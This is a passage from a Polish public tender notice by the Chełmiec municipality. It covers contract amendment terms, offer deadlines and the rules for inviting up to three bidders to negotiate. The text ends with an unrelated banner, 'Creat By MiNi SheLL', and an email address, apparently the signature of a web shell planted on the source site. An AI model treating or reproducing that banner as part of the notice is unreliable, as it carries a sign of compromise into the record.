umowy Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie zmniejszonego lub zwiększonego podatku zapłaconego przez wykonawcę.<br/>5.	Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.<br/>6.	Nie stanowi istotnej zmiany umowy:<br/>1) zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy (np. zmiana nr rachunku bankowego, zmiana formy wniesienia zabezpieczenia należytego wykonania umowy);<br/>2) zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między stronami. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-16 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/chelmiec</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-16 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-14</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Zamawiający wskazuje, że w celu ograniczenia liczby wykonawców zapraszanych do<br/>negocjacji ofert, zamierza zastosować kryterium ,,Ceny”,<br/>kryterium „termin płatności faktury” według zasad, wag i wzorów<br/>przyznawania punktacji określonych w rozdziale XIX. Przy czym maksymalnie 3 wykonawców<br/>zostanie zaproszonych do negocjacji ofert z zastrzeżeniem ust. 6.

Creat By MiNi SheLL
Email: jattceo@gmail.com